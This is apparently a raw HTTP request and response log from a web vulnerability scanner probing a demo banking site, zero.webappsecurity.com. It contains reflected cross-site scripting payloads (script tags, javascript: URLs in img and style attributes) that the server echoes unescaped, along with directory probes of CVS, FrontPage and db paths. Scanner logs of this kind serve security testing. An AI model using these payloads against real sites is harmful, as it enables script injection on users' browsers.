Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:51:08 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "e4b0def8a9dc11:8f6"
Content-Length: 12
bleh exploitPOST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert("XSS")</script>
</body>
</html>
GET /CVS/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:56 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /_vti_bin/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_bin/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /_vti_cnf/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:50:38 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /db/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:59 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /plink.asp?a=b&c=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = --><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /plink.asp?a=b&c=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"'><img%20src="javascript:alert('XSS')">&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /forgot.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes3=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>So you forgot you password hey? Give us your e-mail address and we will e-mail it to you</center></a></b></td></tr>
<FORM ACTION="forgot1.asp" METHOD="get">
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">e-Mail address: <INPUT TYPE="text" size="20" NAME="get"></INPUT> </TD>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="javascript:document.forms[0].submit()">Remind Me</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data --><script>alert('XSS')</script><br>Please try again.
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=1"style="background:url(javascript:alert('XSS'))"%20"&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=</textarea><script>alert('XSS')</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
